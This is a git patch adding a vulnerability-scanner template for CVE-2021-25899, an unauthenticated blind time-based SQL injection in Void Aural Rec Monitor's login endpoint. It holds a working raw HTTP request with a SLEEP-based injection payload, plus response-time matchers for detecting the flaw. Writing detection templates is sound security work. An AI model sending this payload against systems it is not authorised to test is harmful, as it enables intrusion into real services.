From ebf62bcc48f58a32848eea85aadd32c045a33932 Mon Sep 17 00:00:00 2001 From: edoardottt Date: Sat, 1 Oct 2022 10:15:59 +0200 Subject: [PATCH] Add CVE-2021-25899 --- cves/2021/CVE-2021-25899.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2021/CVE-2021-25899.yaml diff --git a/cves/2021/CVE-2021-25899.yaml b/cves/2021/CVE-2021-25899.yaml new file mode 100644 index 0000000000..cd8c4c026b --- /dev/null +++ b/cves/2021/CVE-2021-25899.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-25899 + +info: + name: Void Aural Rec Monitor 9.0.0.1 - SQL Injection + author: edoardottt + severity: critical + description: | + An issue was discovered in svc-login.php in Void Aural Rec Monitor 9.0.0.1. An unauthenticated attacker can send a crafted HTTP request to perform a blind time-based SQL Injection. The vulnerable parameter is param1. + reference: + - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28765 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25899 + classification: + cve-id: CVE-2021-25899 + tags: cve,auralrecmonitor,cve2021,sqli + +requests: + - raw: + - | + POST /AurallRECMonitor/services/svc-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + param1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))dummy)--+dummy¶m2=test + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration>=5' + + - type: status + status: + - 200 \ No newline at end of file